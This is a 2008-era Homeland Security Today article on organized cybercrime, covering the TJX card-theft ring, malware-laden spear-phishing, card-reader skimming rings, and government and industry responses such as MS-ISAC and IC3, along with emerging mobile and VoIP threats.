The New Era in Netcentric Security

Two young Miami men in their 20s, Albert “Segvec” Gonzalez and Damon Patrick Toey, began their scheme by “war driving,” or driving around looking to eavesdrop on wireless networks. With what they later recalled was surprisingly little difficulty, they were able to begin over the course of a few days to hack into the wireless networks of a slew of large retail businesses, including TJX, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Dave & Buster’s, Sports Authority, Forever 21 and DSW.
Once they gained access to the systems, they installed programs that would capture card numbers as well as password and account information. They concealed all the data on encrypted computer servers they shared with criminal collaborators in Eastern Europe and the United States. Some of the numbers they’d stolen were quickly sold on the Internet to other data criminals around the world. Other card information they deemed particularly valuable they decided to keep and “cash out” by encoding the stolen numbers on the magnetic strips of blank cards, which were then used to take tens of thousands of dollars out of automatic teller machines.
By the time they were indicted on Aug. 5 by the US Department of Justice after a multi-year investigation by the US Secret Service, Gonzalez, Toey and their gang of other US citizens, an Estonian, three Ukrainians, two Chinese and a hacker in Belarus had stolen and sold or used millions of credit and debit card numbers.
Gonzalez, Toey and company represent the emerging face both of a new organized criminal epidemic and, perhaps more ominously, a new potentially highly destructive technological platform for wreaking disruption of the security of American citizens and institutions.
Although their case was called at the time of their indictment “the single largest and most complex identity theft case ever charged in this country” by Attorney General Michael Mukasey, their exploits, according to many cybersecurity experts, represent only the tip of the iceberg of the globally escalating phenomenon of cybercrime.
“Technology has obviously enhanced our lives and economy in many ways, but it’s also created serious new vulnerabilities,” William Pelgrin, director of Cybersecurity and Critical Infrastructure Coordination (CSCI) for the state of New York, told HSToday. “But as the extent, magnitude and costs of global cybercrime begin to sink in, it shows how simple strokes on a keyboard with a criminal purpose can have devastating results.”
No longer the strict preserve of isolated hackers, or cyberpunks, whose goal was primarily to show off to their peers by breaching the perimeters of networks or, at worst, launching malicious pranks, cyberattacks have become an increasingly organized criminal enterprise. The extent of its growing reach was documented in June 2007 in a Government Accountability Office (GAO) report titled CYBERCRIME: Public and Private Entities Face Challenges in Addressing Cyber Threats. The report concluded, “Cybercrime is a threat to US national economic and security interests. Based on various studies and expert opinion, GAO estimated the direct economic impact from cybercrime to be, conservatively, in the tens of billions of dollars.
Cybercrime and national security
Increasingly, the boundaries between financially motivated cyber criminality, cyber-espionage and, possibly, cybercrime financing of terror organizations have become blurred.
In an investigative report published in April 2008, the magazine BusinessWeek obtained an e-mail originally aimed at defense consulting firm Booz Allen that was traced back to an Internet address in China, an e-mail which, according to the report, “paints a vivid picture of the alarming new capabilities of America’s cyber enemies.”
The e-mail, which bore the subject line “‘Integrate US, Russian, and Indian weapons and avionics,” was apparently sent by Stephen Moree, a civilian working for a group that reports to the office of the Air Force secretary and evaluates the sales of US military aircraft to other countries.
Nonetheless, an analysis of the e-mail conducted for BusinessWeek by three cybersecurity specialists discovered it was a fake sent by an unknown attacker, bounced through an Internet address in South Korea and relayed through a Yahoo server in New York. The analysis also showed the e-mail was coded with malicious software designed to track keystrokes on the computers of people who open it, give the attacker control over the “host” computer, capturing screen shots and files that can, according to the report, be transmitted back to its “master” at an Internet address currently registered under the name cybersyndrome.3322.org housed in one of China’s largest free domain-name-registration and e-mail services.
China and Eastern Europe are hardly the only known source of cybercrime attacks.
In October 2008, according to the Oct. 11, 2008, The Wall Street Journal, European law enforcement officials, aided by US intelligence officials, uncovered a data theft ring apparently designed to funnel account data to Pakistan from hundreds of credit and debit card machines across Europe, including huge retail chains like a British unit of Wal-Mart Inc. and Tesco Ltd.
The scheme used untraceable devices inserted into credit-card readers that were made in China and sent account data by a wireless connection to computer servers in Lahore, Pakistan. Investigators found hundreds of machines in at least five countries: Britain, Ireland, Belgium, the Netherlands and Denmark.
According to The Wall Street Journal account, US intelligence officials, including senior National Security Agency officials, are monitoring the case, in part because of its ties to Pakistan, which has become home to a resurgent Al Qaeda.
More pernicious malware
The technological underpinning of the evolution of organized criminality has been a new generation of increasingly pernicious technical innovations.
Cybercriminals traditionally have used viruses or bots to search for vulnerable computers where they can load their own programs or store data. A bot network is a collection of these infected machines, often compromised weeks or months earlier by attackers using worms or viruses to plant backdoor components that can be centrally controlled and used to launch simultaneous attacks.
Increasingly, according to Mike Carpenter, senior vice president of Public Sector solutions for online security solutions developer McAfee, Santa Clara, Calif., “spammers, hackers, and other cybercriminals are acquiring or renting bot networks, making it harder for authorities to track down the real culprits.”
While these threats have been around for several years, Carpenter added, what’s really new is the increasing sophistication and refinement that malware writers are adding to their tools and attack techniques.
“Earlier attackers used to deface websites after they hacked them, usually leaving a note on the site in the hope of becoming famous,” Carpenter told HSToday. “That’s no longer the case. Hackers are now spreading malware by first compromising popular websites, stealthily planting malware and luring users via social engineering tricks.”
This malware allows the adversary to gain full control of the compromised systems, leading to the exfiltration of sensitive information or installation of utilities that facilitate remote control of the host.
“The development of Web-based malware has marked a tipping point,” Phyllis Schneck, vice-president of research integration for Secure Computing, San Jose, Calif., said to HSToday. “It has allowed attackers to get far more targetedin going after highly specific kinds of information.”
According to the ScanSafe Global Threat Report released in September 2008 (available with registration through http://www.scansafe. com) by San Francisco, Calif.-based ScanSafe, a provider of web security software, the volume of malware blocks increased by 338 percent in the third quarter compared with the first quarter of this year.
“What surprised and concerned me most about the report,” Mary Landesman, senior security researcher at ScanSafe and author of the report, “is that we’re seeing a dramatic increase in concentrated malware exposure within four key verticals: chemical, energy, pharmaceutical and engineering sites. Now, in theory, sites with the most browsing traffic, consumer-facing sites, should have the most malware. But this is an indication. Though the data remains inconclusive, it supports the notion that malware attacks are becoming far less randomized, far less just catch-as-catch-can theft of financial data or identity.”
Getting ahead of the curve
Combating cybercrime is a multi-dimensional challenge encompassing technological, educational and legal components.
“The security industry must provide technology solutions that stay one step ahead of the threats,” said Carpenter. “This requires constant effort. The quality of software needs to improve. It used to be that attacks were focused on the operating system level but the target has now moved to the application layer, which has not had nearly enough security focus.”
One way McAfee Inc. has attempted to redefine how computers are protected against viruses, worms, Trojan horses and other malicious programs is a new Internet-based service hosted by McAfee Avert Labs to provide active protection on the fly when a computer gets hit by malicious computer code. Named Artemis, it’s the industry’s first technology to shield computer users against attacks as they happen without requiring a traditional, scheduled update of threat signatures to be installed on the machine.
“When you have malware threats beginning to scale into several hundred new ones every single day and growing rapidly, the old paradigm of needing to create and install a new patch once each new malware signature is discovered becomes a losing proposition,” Carpenter related. “Even the best financed IT systems in the largest enterprises in the world can’t be loading 120,000 new versions of protective software per year.”
As important as technology is in securing cyberspace, education and communication, Schneck believes, are equally important. “One interesting thing,” she said, “is that the bad guys so far have been far better at sharing information to evolve ever more sophisticated ways of probing and attacking network vulnerabilities than the good guys. The good guys have been playing catch-up and, despite some progress, still mostly are behind the curve, frankly.”
To address this need, a number of vendors, industry and non-profit groups have launched educational initiatives.
One such effort is McAfee’s soon to be launched Cybercrime Response Unit (CRU), which will help consumers and businesses that believe they have become the victim of cybercrime to report the incident and secure their credit. The unit will provide help assessing the situation, including advice on what evidence to gather for law enforcement to bring a case, and refer victims to the appropriate law enforcement agencies, credit agencies, support agencies and other organizations.
“Awareness needs to be raised that cybercrime is not a victimless crime,” said Carpenter. “Oftentimes, perpetrators think of cybercrime as easy money or as a crime without impact on another person’s life—far from the case. Would-be cybercriminals need to understand that they do risk getting caught and that cybercrime is as serious as brick-and-mortar crime—crimes with a ‘face.’ Law enforcement wants to do the right thing, but as this is such a new area for the legal system, there needs to be far more visibility into the real costs, human and financial, of cybercrime.”
The federal government has launched IC3, a joint initiative of a partnership between the Federal Bureau of Investigation, the National White Collar Crime Center and the Bureau of Justice Assistance. It is a vehicle to receive, develop and refer criminal complaints regarding the rapidly expanding arena of cybercrime. “The IC3 gives the victims of cybercrime a convenient and easy-to-use reporting mechanism that alerts authorities of suspected criminal or civil violations,” Carpenter said.
The most ambitious federal project, announced last spring but still largely classified, is The National Strategy to Secure Cyberspace (NSCC). Headed by the Department of Homeland Security (DHS), NSSC has three stated strategic objectives: to prevent cyber attacks against America’s critical infrastructures; to reduce national vulnerability to cyber attacks and to minimize damage and recovery time from cyber attacks that do occur.
As explained by DHS Deputy Secretary Paul Schneider in a speech in September, “DHS has the lead responsibility to protect the federal civilian domains and networks, which basically means anything with a dot-gov address. The Department of Defense has made great strides in the strengthening and the protection of their networks and the dot-mil environment. So we are leading the charge to do the same for dot-gov.”
The Multi-State Information Sharing and Analysis Center (MS-ISAC), Albany, NY, a collaborative organization with participation from all 50 states, the District of Columbia, local governments and US territories, is designed to provide a common mechanism for raising the level of cybersecurity readiness and response in each state and with local governments.
An example of how this collaboration works, Pelgrin, the cybersecurity chief who founded and chairs the organization, told HSToday, is an alert map application that the group developed.
“This is a map of the nation,” Pelgrin explained, “in which each state displays its current cybersecurity alert level, along with contact information for the Multi-ISAC members, who have adopted this common Cyber Alert Indicator Protocol process; thus, when any Multi-State ISAC member state is at a “Guarded” level for cyber, for example, all of the other Multi-State ISAC members will know the specific criteria used to arrive at that level.”
Multi-State ISAC has also established a shared 24/7 incident management system that provides cybersecurity monitoring for, and analysis of, intrusions and other anomalous cyber activity for New York State agencies and public universities, as well as the members of the Multi-State ISAC.
“Reporting incidents to a central group promotes collaboration and information sharing with other sites that may be experiencing similar problems,” Pelgrin said.
The global nature of cybercrime makes arresting and prosecuting cybercriminals difficult. As Carpenter explained, “Without a globally coordinated law enforcement effort, you might be able to track down a criminal group to a particular foreign location, hand off the case and then find it can’t be prosecuted. Currently, the legal frameworks that apply across borders to address emerging threats are not functioning well, oftentimes hobbling investigations.”
A key example of the type of global collaboration necessary, Carpenter said, is the European Convention on cybercrime, the first international treaty on crimes, as a prototype of the kind of global law enforcement approach needed. The convention’s mandate is to pursue a common criminal policy aimed at the protection of society against cybercrime, especially by adopting appropriate legislation and fostering international cooperation. The convention is the product of four years of work by Council of Europe experts, but also by the United States, Canada, Japan and other countries that are not members of the organization.
Emerging threats: mobile and VoIP
Cybercrime is a constantly morphing threat and fighting it is a never-ending battle. In its look ahead to the cyberthreat landscape titled Emerging Cyberthreats Report for 2009, published in October 2008, researchers at the Georgia Tech Information Security Center (GTISC), Atlanta, Ga., cited wireless and voice over Internet protocol (VoIP) as two areas where network security remains way behind the curve of rising cybercrime.
Focusing on mobile phones, the report quotes Dave Amster, vice president of security investigations for Equifax, an Atlanta, Ga.-based financial data and information technology company, as saying, “More and more financial transactions will take place over mobile devices. Consumers are ordering credit reports from their Blackberrys, which puts valuable information at risk.”
The forward challenge for businesses and banks, according to Amster, “is going to be maintaining secure mobile applications and ease of use at the same time.”
Patrick Traynor, an assistant professor in the School of Computer Science at Georgia Tech and a member of GTISC, predicted that as smart phones such as the iPhone store more personal identity, payment card information and other data, they will be targeted by malware, which will be injected onto cell phones to turn them into bots, which could then be combined into botnets that could perpetrate denial-of-service attacks against the core of the cellular network. At this point, even rudimentary security systems are lacking on many wireless data networks.
Another key vulnerability is VoIP telephony. “As Internet telephony and mobile computing handle more and more data, they will become more frequent targets of cybercrime. Once you begin—as many Fortune 1000 companies are already doing—to transmit voice calls digitally, they become susceptible to the same kinds of attacks that occur on any digital network—from data theft, denial-of-service, remote code execution and botnets.
An example of the kind of critical network data potentially exposed over IP is the nation’s 911 emergency call system.
“A big evolution occurring in the 911 industry, from traditional 911 to Next Generation 911,” Jeremy Smith, technical solutions engineer at Temecula, Calif.-based PlantCML, told HSToday, “serves both the public safety and private security sectors. It’s dramatic, and everyone’s scrambling to make sure they’re secure in this new way of doing things.”
The new way of doing things is by IP. Where traditionally, Smith explained, 911 was a TDM or telephony-based system with a physical PBX [private branch exchange], it’s now moving toward a purely IP model with [VoIP].
“911 systems are prime targets for hackers,” said Smith. “But in most cases, 911 centers have never been connected to the Internet or other networks, and hackers targeting the systems had to have actual physical access to the target to do their phone phreaking. So in the past, the overhead associated with 911 hacking has been high and a good deterrent. However, next generation 911 interconnects call centers with IP, giving attackers a much lower barrier to entry.
So now the risk of hacking will go up, because the overhead associated with that hacking is so much less.”
Besides spam, other VoIP-related threats, such as viruses and other types of malware, will become a major issue, he predicted: “Wemay not be dealing a lot today with inbound and outbound Internet threats, but in the next generation of 911, we will.”
Analysis
When faced with a growing threat, there are two common responses. One is to ignore, minimize or wholly deny the threat. The other is to inflate the threat beyond the concrete facts. Both of these tactics, in the words of William Pelgrin, have a similar result—“the victory of paralysis over proactivity.”
In their stead, he urged that far closer relationships be forged among the public, policy makers and security professionals.
“None of us is as smart as all of us,” he said. “Therefore, collaboration, cooperation and communication need to be the cornerstones of a viable approach. No one community, whether it’s corporations, government, technologists or law enforcement, can do this alone.” HST

(Visited 22 times, 1 visits today)

The Government Technology & Services Coalition's Homeland Security Today (HSToday) is the premier news and information resource for the homeland security community, dedicated to elevating the discussions and insights that can support a safe and secure nation. A non-profit magazine and media platform, HSToday provides readers with the whole story, placing facts and comments in context to inform debate and drive realistic solutions to some of the nation’s most vexing security challenges.

Leave a Reply